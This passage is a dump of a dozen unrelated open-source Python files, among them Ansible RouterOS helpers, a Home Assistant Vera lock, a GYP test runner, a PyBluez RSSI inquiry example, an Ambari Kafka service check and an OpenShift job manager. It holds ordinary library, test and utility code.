'icon': 'STOCK_INDENT'
}, context)
return {'type':'ir.actions.act_window_close'}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
richardcs/ansible
|
refs/heads/devel
|
lib/ansible/module_utils/network/routeros/routeros.py
|
35
|
# This code is part of Ansible, but is an independent component.
# This particular file snippet, and this file snippet only, is BSD licensed.
# Modules you write using this snippet, which is embedded dynamically by Ansible
# still belong to the author of the module, and may assign their own license
# to the complete work.
#
# (c) 2016 Red Hat Inc.
#
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
# IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE
# USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
import json
from ansible.module_utils._text import to_text
from ansible.module_utils.basic import env_fallback, return_values
from ansible.module_utils.network.common.utils import to_list, ComplexList
from ansible.module_utils.connection import Connection, ConnectionError
_DEVICE_CONFIGS = {}
routeros_provider_spec = {
'host': dict(),
'port': dict(type='int'),
'username': dict(fallback=(env_fallback, ['ANSIBLE_NET_USERNAME'])),
'password': dict(fallback=(env_fallback, ['ANSIBLE_NET_PASSWORD']), no_log=True),
'ssh_keyfile': dict(fallback=(env_fallback, ['ANSIBLE_NET_SSH_KEYFILE']), type='path'),
'timeout': dict(type='int')
}
routeros_argument_spec = {}
def get_provider_argspec():
return routeros_provider_spec
def get_connection(module):
if hasattr(module, '_routeros_connection'):
return module._routeros_connection
capabilities = get_capabilities(module)
network_api = capabilities.get('network_api')
if network_api == 'cliconf':
module._routeros_connection = Connection(module._socket_path)
else:
module.fail_json(msg='Invalid connection type %s' % network_api)
return module._routeros_connection
def get_capabilities(module):
if hasattr(module, '_routeros_capabilities'):
return module._routeros_capabilities
capabilities = Connection(module._socket_path).get_capabilities()
module._routeros_capabilities = json.loads(capabilities)
return module._routeros_capabilities
def get_defaults_flag(module):
connection = get_connection(module)
try:
out = connection.get('/system default-configuration print')
except ConnectionError as exc:
module.fail_json(msg=to_text(exc, errors='surrogate_then_replace'))
out = to_text(out, errors='surrogate_then_replace')
commands = set()
for line in out.splitlines():
if line.strip():
commands.add(line.strip().split()[0])
if 'all' in commands:
return ['all']
else:
return ['full']
def get_config(module, flags=None):
flag_str = ' '.join(to_list(flags))
try:
return _DEVICE_CONFIGS[flag_str]
except KeyError:
connection = get_connection(module)
try:
out = connection.get_config(flags=flags)
except ConnectionError as exc:
module.fail_json(msg=to_text(exc, errors='surrogate_then_replace'))
cfg = to_text(out, errors='surrogate_then_replace').strip()
_DEVICE_CONFIGS[flag_str] = cfg
return cfg
def to_commands(module, commands):
spec = {
'command': dict(key=True),
'prompt': dict(),
'answer': dict()
}
transform = ComplexList(spec, module)
return transform(commands)
def run_commands(module, commands, check_rc=True):
responses = list()
connection = get_connection(module)
for cmd in to_list(commands):
if isinstance(cmd, dict):
command = cmd['command']
prompt = cmd['prompt']
answer = cmd['answer']
else:
command = cmd
prompt = None
answer = None
try:
out = connection.get(command, prompt, answer)
except ConnectionError as exc:
module.fail_json(msg=to_text(exc, errors='surrogate_then_replace'))
try:
out = to_text(out, errors='surrogate_or_strict')
except UnicodeError:
module.fail_json(
msg=u'Failed to decode output from %s: %s' % (cmd, to_text(out)))
responses.append(out)
return responses
def load_config(module, commands):
connection = get_connection(module)
out = connection.edit_config(commands)
|
dmeulen/home-assistant
|
refs/heads/dev
|
homeassistant/components/lock/vera.py
|
18
|
"""
Support for Vera locks.
For more details about this platform, please refer to the documentation at
https://home-assistant.io/components/lock.vera/
"""
import logging
from homeassistant.components.lock import LockDevice
from homeassistant.const import (STATE_LOCKED, STATE_UNLOCKED)
from homeassistant.components.vera import (
VeraDevice, VERA_DEVICES, VERA_CONTROLLER)
_LOGGER = logging.getLogger(__name__)
DEPENDENCIES = ['vera']
def setup_platform(hass, config, add_devices, discovery_info=None):
"""Find and return Vera locks."""
add_devices(
VeraLock(device, VERA_CONTROLLER) for
device in VERA_DEVICES['lock'])
class VeraLock(VeraDevice, LockDevice):
"""Representation of a Vera lock."""
def __init__(self, vera_device, controller):
"""Initialize the Vera device."""
self._state = None
VeraDevice.__init__(self, vera_device, controller)
def lock(self, **kwargs):
"""Lock the device."""
self.vera_device.lock()
self._state = STATE_LOCKED
self.update_ha_state()
def unlock(self, **kwargs):
"""Unlock the device."""
self.vera_device.unlock()
self._state = STATE_UNLOCKED
self.update_ha_state()
@property
def is_locked(self):
"""Return true if device is on."""
return self._state == STATE_LOCKED
def update(self):
"""Called by the Vera device callback to update state."""
self._state = (STATE_LOCKED if self.vera_device.is_locked(True)
else STATE_UNLOCKED)
|
areski/django
|
refs/heads/master
|
tests/migrations/test_migrations_squashed_complex/3_squashed_5.py
|
770
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
replaces = [
("migrations", "3_auto"),
("migrations", "4_auto"),
("migrations", "5_auto"),
]
dependencies = [("migrations", "2_auto")]
operations = [
migrations.RunPython(migrations.RunPython.noop)
]
|
vane/django_tornado
|
refs/heads/master
|
push/context_processors.py
|
1
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
__author__ = 'michal@vane.pl'
import constraint
def const(request):
return {
'SITE_PROTOCOL': constraint.PROTOCOL,
'SITE_HOST': constraint.HOST,
'SITE_PORT': constraint.PORT,
}
|
davie668/myQuiz
|
refs/heads/master
|
node_modules/gulp-sass/node_modules/node-sass/node_modules/node-gyp/gyp/gyptest.py
|
1752
|
#!/usr/bin/env python
# Copyright (c) 2012 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
__doc__ = """
gyptest.py -- test runner for GYP tests.
"""
import os
import optparse
import subprocess
import sys
class CommandRunner(object):
"""
Executor class for commands, including "commands" implemented by
Python functions.
"""
verbose = True
active = True
def __init__(self, dictionary={}):
self.subst_dictionary(dictionary)
def subst_dictionary(self, dictionary):
self._subst_dictionary = dictionary
def subst(self, string, dictionary=None):
"""
Substitutes (via the format operator) the values in the specified
dictionary into the specified command.
The command can be an (action, string) tuple. In all cases, we
perform substitution on strings and don't worry if something isn't
a string. (It's probably a Python function to be executed.)
"""
if dictionary is None:
dictionary = self._subst_dictionary
if dictionary:
try:
string = string % dictionary
except TypeError:
pass
return string
def display(self, command, stdout=None, stderr=None):
if not self.verbose:
return
if type(command) == type(()):
func = command[0]
args = command[1:]
s = '%s(%s)' % (func.__name__, ', '.join(map(repr, args)))
if type(command) == type([]):
# TODO: quote arguments containing spaces
# TODO: handle meta characters?
s = ' '.join(command)
else:
s = self.subst(command)
if not s.endswith('\n'):
s += '\n'
sys.stdout.write(s)
sys.stdout.flush()
def execute(self, command, stdout=None, stderr=None):
"""
Executes a single command.
"""
if not self.active:
return 0
if type(command) == type(''):
command = self.subst(command)
cmdargs = shlex.split(command)
if cmdargs[0] == 'cd':
command = (os.chdir,) + tuple(cmdargs[1:])
if type(command) == type(()):
func = command[0]
args = command[1:]
return func(*args)
else:
if stdout is sys.stdout:
# Same as passing sys.stdout, except python2.4 doesn't fail on it.
subout = None
else:
# Open pipe for anything else so Popen works on python2.4.
subout = subprocess.PIPE
if stderr is sys.stderr:
# Same as passing sys.stderr, except python2.4 doesn't fail on it.
suberr = None
elif stderr is None:
# Merge with stdout if stderr isn't specified.
suberr = subprocess.STDOUT
else:
# Open pipe for anything else so Popen works on python2.4.
suberr = subprocess.PIPE
p = subprocess.Popen(command,
shell=(sys.platform == 'win32'),
stdout=subout,
stderr=suberr)
p.wait()
if stdout is None:
self.stdout = p.stdout.read()
elif stdout is not sys.stdout:
stdout.write(p.stdout.read())
if stderr not in (None, sys.stderr):
stderr.write(p.stderr.read())
return p.returncode
def run(self, command, display=None, stdout=None, stderr=None):
"""
Runs a single command, displaying it first.
"""
if display is None:
display = command
self.display(display)
return self.execute(command, stdout, stderr)
class Unbuffered(object):
def __init__(self, fp):
self.fp = fp
def write(self, arg):
self.fp.write(arg)
self.fp.flush()
def __getattr__(self, attr):
return getattr(self.fp, attr)
sys.stdout = Unbuffered(sys.stdout)
sys.stderr = Unbuffered(sys.stderr)
def is_test_name(f):
return f.startswith('gyptest') and f.endswith('.py')
def find_all_gyptest_files(directory):
result = []
for root, dirs, files in os.walk(directory):
if '.svn' in dirs:
dirs.remove('.svn')
result.extend([ os.path.join(root, f) for f in files if is_test_name(f) ])
result.sort()
return result
def main(argv=None):
if argv is None:
argv = sys.argv
usage = "gyptest.py [-ahlnq] [-f formats] [test ...]"
parser = optparse.OptionParser(usage=usage)
parser.add_option("-a", "--all", action="store_true",
help="run all tests")
parser.add_option("-C", "--chdir", action="store", default=None,
help="chdir to the specified directory")
parser.add_option("-f", "--format", action="store", default='',
help="run tests with the specified formats")
parser.add_option("-G", '--gyp_option', action="append", default=[],
help="Add -G options to the gyp command line")
parser.add_option("-l", "--list", action="store_true",
help="list available tests and exit")
parser.add_option("-n", "--no-exec", action="store_true",
help="no execute, just print the command line")
parser.add_option("--passed", action="store_true",
help="report passed tests")
parser.add_option("--path", action="append", default=[],
help="additional $PATH directory")
parser.add_option("-q", "--quiet", action="store_true",
help="quiet, don't print test command lines")
opts, args = parser.parse_args(argv[1:])
if opts.chdir:
os.chdir(opts.chdir)
if opts.path:
extra_path = [os.path.abspath(p) for p in opts.path]
extra_path = os.pathsep.join(extra_path)
os.environ['PATH'] = extra_path + os.pathsep + os.environ['PATH']
if not args:
if not opts.all:
sys.stderr.write('Specify -a to get all tests.\n')
return 1
args = ['test']
tests = []
for arg in args:
if os.path.isdir(arg):
tests.extend(find_all_gyptest_files(os.path.normpath(arg)))
else:
if not is_test_name(os.path.basename(arg)):
print >>sys.stderr, arg, 'is not a valid gyp test name.'
sys.exit(1)
tests.append(arg)
if opts.list:
for test in tests:
print test
sys.exit(0)
CommandRunner.verbose = not opts.quiet
CommandRunner.active = not opts.no_exec
cr = CommandRunner()
os.environ['PYTHONPATH'] = os.path.abspath('test/lib')
if not opts.quiet:
sys.stdout.write('PYTHONPATH=%s\n' % os.environ['PYTHONPATH'])
passed = []
failed = []
no_result = []
if opts.format:
format_list = opts.format.split(',')
else:
# TODO: not duplicate this mapping from pylib/gyp/__init__.py
format_list = {
'aix5': ['make'],
'freebsd7': ['make'],
'freebsd8': ['make'],
'openbsd5': ['make'],
'cygwin': ['msvs'],
'win32': ['msvs', 'ninja'],
'linux2': ['make', 'ninja'],
'linux3': ['make', 'ninja'],
'darwin': ['make', 'ninja', 'xcode', 'xcode-ninja'],
}[sys.platform]
for format in format_list:
os.environ['TESTGYP_FORMAT'] = format
if not opts.quiet:
sys.stdout.write('TESTGYP_FORMAT=%s\n' % format)
gyp_options = []
for option in opts.gyp_option:
gyp_options += ['-G', option]
if gyp_options and not opts.quiet:
sys.stdout.write('Extra Gyp options: %s\n' % gyp_options)
for test in tests:
status = cr.run([sys.executable, test] + gyp_options,
stdout=sys.stdout,
stderr=sys.stderr)
if status == 2:
no_result.append(test)
elif status:
failed.append(test)
else:
passed.append(test)
if not opts.quiet:
def report(description, tests):
if tests:
if len(tests) == 1:
sys.stdout.write("\n%s the following test:\n" % description)
else:
fmt = "\n%s the following %d tests:\n"
sys.stdout.write(fmt % (description, len(tests)))
sys.stdout.write("\t" + "\n\t".join(tests) + "\n")
if opts.passed:
report("Passed", passed)
report("Failed", failed)
report("No result from", no_result)
if failed:
return 1
else:
return 0
if __name__ == "__main__":
sys.exit(main())
|
reelai/packstack
|
refs/heads/master
|
packstack/installer/utils/__init__.py
|
6
|
# -*- coding: utf-8 -*-
from .datastructures import SortedDict
from .decorators import retry
from .network import get_localhost_ip, host2ip, force_ip, device_from_ip
from .shell import ScriptRunner, execute
from .shortcuts import (host_iter, hosts, get_current_user,
get_current_username, split_hosts)
from .strings import (COLORS, color_text, mask_string, state_format,
state_message)
__all__ = ('SortedDict',
'retry',
'get_localhost_ip', 'host2ip', 'force_ip', 'device_from_ip',
'ScriptRunner', 'execute',
'host_iter', 'hosts', 'get_current_user', 'get_current_username',
'split_hosts', 'COLORS', 'color_text', 'mask_string',
'state_format', 'state_message')
|
RockySteveJobs/python-for-android
|
refs/heads/master
|
python-modules/pybluez/examples/advanced/inquiry-with-rssi.py
|
47
|
# performs a simple device inquiry, followed by a remote name request of each
# discovered device
import os
import sys
import struct
import bluetooth._bluetooth as bluez
def printpacket(pkt):
for c in pkt:
sys.stdout.write("%02x " % struct.unpack("B",c)[0])
print
def read_inquiry_mode(sock):
"""returns the current mode, or -1 on failure"""
# save current filter
old_filter = sock.getsockopt( bluez.SOL_HCI, bluez.HCI_FILTER, 14)
# Setup socket filter to receive only events related to the
# read_inquiry_mode command
flt = bluez.hci_filter_new()
opcode = bluez.cmd_opcode_pack(bluez.OGF_HOST_CTL,
bluez.OCF_READ_INQUIRY_MODE)
bluez.hci_filter_set_ptype(flt, bluez.HCI_EVENT_PKT)
bluez.hci_filter_set_event(flt, bluez.EVT_CMD_COMPLETE);
bluez.hci_filter_set_opcode(flt, opcode)
sock.setsockopt( bluez.SOL_HCI, bluez.HCI_FILTER, flt )
# first read the current inquiry mode.
bluez.hci_send_cmd(sock, bluez.OGF_HOST_CTL,
bluez.OCF_READ_INQUIRY_MODE )
pkt = sock.recv(255)
status,mode = struct.unpack("xxxxxxBB", pkt)
if status != 0: mode = -1
# restore old filter
sock.setsockopt( bluez.SOL_HCI, bluez.HCI_FILTER, old_filter )
return mode
def write_inquiry_mode(sock, mode):
"""returns 0 on success, -1 on failure"""
# save current filter
old_filter = sock.getsockopt( bluez.SOL_HCI, bluez.HCI_FILTER, 14)
# Setup socket filter to receive only events related to the
# write_inquiry_mode command
flt = bluez.hci_filter_new()
opcode = bluez.cmd_opcode_pack(bluez.OGF_HOST_CTL,
bluez.OCF_WRITE_INQUIRY_MODE)
bluez.hci_filter_set_ptype(flt, bluez.HCI_EVENT_PKT)
bluez.hci_filter_set_event(flt, bluez.EVT_CMD_COMPLETE);
bluez.hci_filter_set_opcode(flt, opcode)
sock.setsockopt( bluez.SOL_HCI, bluez.HCI_FILTER, flt )
# send the command!
bluez.hci_send_cmd(sock, bluez.OGF_HOST_CTL,
bluez.OCF_WRITE_INQUIRY_MODE, struct.pack("B", mode) )
pkt = sock.recv(255)
status = struct.unpack("xxxxxxB", pkt)[0]
# restore old filter
sock.setsockopt( bluez.SOL_HCI, bluez.HCI_FILTER, old_filter )
if status != 0: return -1
return 0
def device_inquiry_with_with_rssi(sock):
# save current filter
old_filter = sock.getsockopt( bluez.SOL_HCI, bluez.HCI_FILTER, 14)
# perform a device inquiry on bluetooth device #0
# The inquiry should last 8 * 1.28 = 10.24 seconds
# before the inquiry is performed, bluez should flush its cache of
# previously discovered devices
flt = bluez.hci_filter_new()
bluez.hci_filter_all_events(flt)
bluez.hci_filter_set_ptype(flt, bluez.HCI_EVENT_PKT)
sock.setsockopt( bluez.SOL_HCI, bluez.HCI_FILTER, flt )
duration = 4
max_responses = 255
cmd_pkt = struct.pack("BBBBB", 0x33, 0x8b, 0x9e, duration, max_responses)
bluez.hci_send_cmd(sock, bluez.OGF_LINK_CTL, bluez.OCF_INQUIRY, cmd_pkt)
results = []
done = False
while not done:
pkt = sock.recv(255)
ptype, event, plen = struct.unpack("BBB", pkt[:3])
if event == bluez.EVT_INQUIRY_RESULT_WITH_RSSI:
pkt = pkt[3:]
nrsp = struct.unpack("B", pkt[0])[0]
for i in range(nrsp):
addr = bluez.ba2str( pkt[1+6*i:1+6*i+6] )
rssi = struct.unpack("b", pkt[1+13*nrsp+i])[0]
results.append( ( addr, rssi ) )
print "[%s] RSSI: [%d]" % (addr, rssi)
elif event == bluez.EVT_INQUIRY_COMPLETE:
done = True
elif event == bluez.EVT_CMD_STATUS:
status, ncmd, opcode = struct.unpack("BBH", pkt[3:7])
if status != 0:
print "uh oh..."
printpacket(pkt[3:7])
done = True
elif event == bluez.EVT_INQUIRY_RESULT:
pkt = pkt[3:]
nrsp = struct.unpack("B", pkt[0])[0]
for i in range(nrsp):
addr = bluez.ba2str( pkt[1+6*i:1+6*i+6] )
results.append( ( addr, -1 ) )
print "[%s] (no RRSI)" % addr
else:
print "unrecognized packet type 0x%02x" % ptype
print "event ", event
# restore old filter
sock.setsockopt( bluez.SOL_HCI, bluez.HCI_FILTER, old_filter )
return results
dev_id = 0
try:
sock = bluez.hci_open_dev(dev_id)
except:
print "error accessing bluetooth device..."
sys.exit(1)
try:
mode = read_inquiry_mode(sock)
except Exception, e:
print "error reading inquiry mode. "
print "Are you sure this a bluetooth 1.2 device?"
print e
sys.exit(1)
print "current inquiry mode is %d" % mode
if mode != 1:
print "writing inquiry mode..."
try:
result = write_inquiry_mode(sock, 1)
except Exception, e:
print "error writing inquiry mode. Are you sure you're root?"
print e
sys.exit(1)
if result != 0:
print "error while setting inquiry mode"
print "result: %d" % result
device_inquiry_with_with_rssi(sock)
|
NEERAJIITKGP/pybbm
|
refs/heads/master
|
pybb/profiles.py
|
11
|
# coding=utf-8
from django.conf import settings
from django.core.exceptions import ImproperlyConfigured
from django.db import models
from django.utils.translation import ugettext_lazy as _
from pybb import defaults, util
from pybb.compat import get_image_field_class, get_username_field
TZ_CHOICES = [(float(x[0]), x[1]) for x in (
(-12, '-12'), (-11, '-11'), (-10, '-10'), (-9.5, '-09.5'), (-9, '-09'),
(-8.5, '-08.5'), (-8, '-08 PST'), (-7, '-07 MST'), (-6, '-06 CST'),
(-5, '-05 EST'), (-4, '-04 AST'), (-3.5, '-03.5'), (-3, '-03 ADT'),
(-2, '-02'), (-1, '-01'), (0, '00 GMT'), (1, '+01 CET'), (2, '+02'),
(3, '+03'), (3.5, '+03.5'), (4, '+04'), (4.5, '+04.5'), (5, '+05'),
(5.5, '+05.5'), (6, '+06'), (6.5, '+06.5'), (7, '+07'), (8, '+08'),
(9, '+09'), (9.5, '+09.5'), (10, '+10'), (10.5, '+10.5'), (11, '+11'),
(11.5, '+11.5'), (12, '+12'), (13, '+13'), (14, '+14'),
)]
class PybbProfile(models.Model):
"""
Abstract class for user profile, site profile should be inherted from this class
"""
class Meta(object):
abstract = True
permissions = (
("block_users", "Can block any user"),
)
signature = models.TextField(_('Signature'), blank=True, max_length=defaults.PYBB_SIGNATURE_MAX_LENGTH)
signature_html = models.TextField(_('Signature HTML Version'), blank=True,
max_length=defaults.PYBB_SIGNATURE_MAX_LENGTH + 30)
time_zone = models.FloatField(_('Time zone'), choices=TZ_CHOICES, default=float(defaults.PYBB_DEFAULT_TIME_ZONE))
language = models.CharField(_('Language'), max_length=10, blank=True, choices=settings.LANGUAGES,
default=settings.LANGUAGE_CODE)
show_signatures = models.BooleanField(_('Show signatures'), blank=True, default=True)
post_count = models.IntegerField(_('Post count'), blank=True, default=0)
avatar = get_image_field_class()(_('Avatar'), blank=True, null=True,
upload_to=util.FilePathGenerator(to='pybb/avatar'))
autosubscribe = models.BooleanField(_('Automatically subscribe'),
help_text=_('Automatically subscribe to topics that you answer'),
default=defaults.PYBB_DEFAULT_AUTOSUBSCRIBE)
def save(self, *args, **kwargs):
self.signature_html = util._get_markup_formatter()(self.signature)
super(PybbProfile, self).save(*args, **kwargs)
@property
def avatar_url(self):
try:
return self.avatar.url
except:
return defaults.PYBB_DEFAULT_AVATAR_URL
def get_display_name(self):
try:
if hasattr(self, 'user'): # we have OneToOne foreign key to user model
return self.user.get_username()
if not defaults.PYBB_PROFILE_RELATED_NAME: # we now in user custom model itself
return self.get_username()
except Exception:
return unicode(self)
|
tktrungna/leetcode
|
refs/heads/master
|
Python/reverse-linked-list.py
|
1
|
"""
QUESTION:
Reverse a singly linked list.
Hint:
A linked list can be reversed either iteratively or recursively. Could you implement both?
"""
# Definition for singly-linked list.
class ListNode:
def __init__(self, x):
self.val = x
self.next = None
class Solution:
# @param {ListNode} head
# @return {ListNode}
def reverseList(self, head):
tail = None
while head:
tmp = head.next
head.next = tail
tail = head
head = tmp
return tail
def reverseList_2(self, head):
def dfs(head,newHead):
if not head:
return newHead
next = head.next
head.next = newHead
return dfs(next,head)
return dfs(head, None)
if __name__ == '__main__':
print
|
arenadata/ambari
|
refs/heads/branch-adh-1.6
|
ambari-server/src/main/resources/stacks/ADH/1.5/services/KAFKA/package/scripts/service_check.py
|
1
|
#!/usr/bin/env python
"""
Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership. The ASF licenses this file
to you under the Apache License, Version 2.0 (the
"License"); you may not use this file except in compliance
with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from resource_management.libraries.script.script import Script
from resource_management.libraries.functions.validate import call_and_match_output
from resource_management.libraries.functions.format import format
from resource_management.core.logger import Logger
from resource_management.core import sudo
import subprocess
class ServiceCheck(Script):
def service_check(self, env):
import params
env.set_params(params)
# TODO, Kafka Service check should be more robust , It should get all the broker_hosts
# Produce some messages and check if consumer reads same no.of messages.
kafka_config = self.read_kafka_config()
topic = "ambari_kafka_service_check"
create_topic_cmd_created_output = "Created topic \"ambari_kafka_service_check\"."
create_topic_cmd_exists_output = "Topic \"ambari_kafka_service_check\" already exists."
source_cmd = format("source {conf_dir}/kafka-env.sh")
topic_exists_cmd = format("{kafka_home}/bin/kafka-topics.sh --zookeeper {kafka_config[zookeeper.connect]} --topic {topic} --list")
topic_exists_cmd_p = subprocess.Popen(topic_exists_cmd.split(" "), stdout=subprocess.PIPE, stderr=subprocess.PIPE)
topic_exists_cmd_out, topic_exists_cmd_err = topic_exists_cmd_p.communicate()
# run create topic command only if the topic doesn't exists
if params.kerberos_security_enabled and params.kafka_kerberos_enabled and topic not in topic_exists_cmd_out:
create_topic_cmd = format("{kafka_home}/bin/kafka-topics.sh --zookeeper {kafka_config[zookeeper.connect]} --create --topic {topic} --partitions 1 --replication-factor 1")
command = 'export JAVA_HOME='+ params.java64_home +' KAFKA_OPTS="-Djava.security.auth.login.config=/etc/kafka/conf/kafka_jaas.conf"' + ' ; ' + create_topic_cmd
Logger.info("Running kafka create topic command: %s" % command)
call_and_match_output(command, format("({create_topic_cmd_created_output})|({create_topic_cmd_exists_output})"), "Failed to check that topic exists", user=params.kafka_user)
else:
if topic not in topic_exists_cmd_out:
create_topic_cmd = format("{kafka_home}/bin/kafka-topics.sh --zookeeper {kafka_config[zookeeper.connect]} --create --topic {topic} --partitions 1 --replication-factor 1")
command = 'export JAVA_HOME='+ params.java64_home + ' ; ' + create_topic_cmd
Logger.info("Running kafka create topic command: %s" % command)
call_and_match_output(command, format("({create_topic_cmd_created_output})|({create_topic_cmd_exists_output})"), "Failed to check that topic exists", user=params.kafka_user)
def read_kafka_config(self):
import params
kafka_config = {}
content = sudo.read_file(params.conf_dir + "/server.properties")
for line in content.splitlines():
if line.startswith("#") or not line.strip():
continue
key, value = line.split("=")
kafka_config[key] = value.replace("\n", "")
return kafka_config
if __name__ == "__main__":
ServiceCheck().execute()
|
FNNDSC/openshiftmgr
|
refs/heads/master
|
openshiftmgr.py
|
1
|
"""
OpenShift cluster manager module that provides functionality to schedule jobs as well as
manage their state in the cluster.
"""
from argparse import ArgumentParser
import yaml
import json
import configparser
import os
from kubernetes import client
from openshift import client as o_client
from openshift import config
class OpenShiftManager(object):
def __init__(self):
parser = ArgumentParser(description='Manage a OpenShift cluster')
group = parser.add_mutually_exclusive_group()
group.add_argument("-s", "--schedule", help="schedule a new job",
metavar='name')
group.add_argument("-r", "--remove", help="remove a previously scheduled job",
metavar='name')
group.add_argument("--state", help="print state of scheduled job",
metavar='name')
parser.add_argument("--conffile", help="OpenShift cluster configuration file")
parser.add_argument("-p", "--project", help="The OpenShift project to create jobs in. Project can also be specified with openshiftmgr.ini or the OPENSHIFTMGR_PROJECT environment variable.")
parser.add_argument("-i", "--image",
help="docker image for the scheduled job container")
parser.add_argument("-c", "--command",
help="command to be run inside scheduled job container")
parser.add_argument("-m", "--mount", help="mount directory in the cluster",
metavar='dir')
self.parser = parser
self.openshift_client = None
self.kube_client = None
self.kube_v1_batch_client = None
def init_openshift_client(self, conf_filepath=None):
"""
Method to get a OpenShift client connected to remote or local OpenShift.
"""
if conf_filepath is None:
config.load_kube_config()
else:
config.load_kube_config(config_file=conf_filepath)
self.openshift_client = o_client.OapiApi()
self.kube_client = client.CoreV1Api()
self.kube_v1_batch_client = client.BatchV1Api()
def schedule(self, image, command, name, project, mountdir=None):
"""
Schedule a new job and returns the job object.
"""
job_str = """
apiVersion: batch/v1
kind: Job
metadata:
name: {name}
spec:
parallelism: 1
completions: 1
activeDeadlineSeconds: 3600
template:
metadata:
name: {name}
spec:
restartPolicy: Never
containers:
- name: {name}
image: {image}
command: {command}
""".format(name=name, command=str(command.split(" ")), image=image)
if mountdir is not None:
job_str = job_str + """
volumeMounts:
- mountPath: /share
name: openshiftmgr-storage
volumes:
- name: openshiftmgr-storage
hostPath:
path: {mountdir}
""".format(mountdir=mountdir)
job_yaml = yaml.load(job_str)
job = self.kube_v1_batch_client.create_namespaced_job(namespace=project, body=job_yaml)
print(yaml.dump(job))
return job
def get_job(self, name, project):
"""
Get the previously scheduled job object.
"""
return self.kube_v1_batch_client.read_namespaced_job(name, project)
def remove(self, name, project):
"""
Remove a previously scheduled job.
"""
self.kube_v1_batch_client.delete_namespaced_job(name, project, {})
def parse(self, args=None):
"""
Parse the arguments passed to the manager and perform the appropriate action.
"""
# parse argument options
options = self.parser.parse_args(args)
config = configparser.ConfigParser()
config.read('openshiftmgr.ini')
project = options.project or os.environ.get('OPENSHIFTMGR_PROJECT') or config['DEFAULT']['OPENSHIFTMGR_PROJECT']
if not project:
self.parser.error("-p/--project is required")
# init the openshift client
if options.conffile:
self.init_openshift_client(options.conffile)
else:
self.init_openshift_client()
if options.schedule:
if not (options.image and options.command):
self.parser.error("-s/--schedule requires -i/--image and -c/--command")
self.schedule(options.image, options.command, options.schedule,
project, options.mount)
if options.remove:
self.remove(options.remove, project)
if options.state:
job = self.get_job(options.state, project)
message = None
state = None
reason = None
if job.status.conditions:
for condition in job.status.conditions:
if condition.type == 'Failed' and condition.status == 'True':
message = 'started'
reason = condition.reason
state = 'failed'
break
if not state:
if job.status.completion_time and job.status.succeeded > 0:
message = 'finished'
state = 'complete'
elif job.status.active > 0:
message = 'started'
state = 'running'
else:
message = 'inactive'
state = 'inactive'
ret_dict = {'Status': {'Message': message,
'State': state,
'Reason': reason,
'Active': job.status.active,
'Failed': job.status.failed,
'Succeeded': job.status.succeeded,
'StartTime': job.status.start_time,
'CompletionTime': job.status.completion_time}}
print(json.dumps(ret_dict))
# ENTRYPOINT
if __name__ == "__main__":
manager = OpenShiftManager()
manager.parse()
|
codevlabs/grab
|
refs/heads/master
|
test/grab_get_request.py
|
11
|
# coding: utf-8
from test.util import build_grab
from test.util import BaseGrabTestCase
class GrabSimpleTestCase(BaseGrabTestCase):
def setUp(self):
self.server.reset()
def test_get(self):
self.server.response['get.data'] = 'Final Countdown'
g = build_grab()
g.go(self.server.get_url())
self.assertTrue(b'Final Countdown' in g.response.body)
def test_body_content(self):
self.server.response['get.data'] = 'Simple String'
g = build_grab()
g.go(self.server.get_url())
self.assertEqual(b'Simple String', g.response.body)
# self.assertEqual('Simple String' in g.response.runtime_body)
def test_status_code(self):
self.server.response['get.data'] = 'Simple String'
g = build_grab()
g.go(self.server.get_url())
self.assertEqual(200, g.response.code)
def test_parsing_response_headers(self):
self.server.response['headers'] = [('Hello', 'Grab')]
g = build_grab()
g.go(self.server.get_url())
self.assertTrue(g.response.headers['Hello'] == 'Grab')
def test_depreated_hammer_mode_options(self):
self.server.response['get.data'] = 'foo'
g = build_grab()
g.setup(hammer_mode=True)
g.go(self.server.get_url())
g.setup(hammer_timeouts=((1, 1), (2, 2)))
g.go(self.server.get_url())
|
lyw07/kolibri
|
refs/heads/develop
|
kolibri/plugins/setup_wizard/kolibri_plugin.py
|
1
|
from __future__ import absolute_import
from __future__ import print_function
from __future__ import unicode_literals
from . import hooks
from kolibri.core.device.hooks import SetupHook
from kolibri.core.webpack import hooks as webpack_hooks
from kolibri.plugins.base import KolibriPluginBase
class SetupWizardPlugin(KolibriPluginBase):
def url_slug(self):
return "^setup_wizard/"
class SetupWizardAsset(webpack_hooks.WebpackBundleHook):
unique_slug = "setup_wizard"
src_file = "assets/src/app.js"
class SetupWizardInclusionHook(hooks.SetupWizardSyncHook):
bundle_class = SetupWizardAsset
class SetupWizardHook(SetupHook):
@property
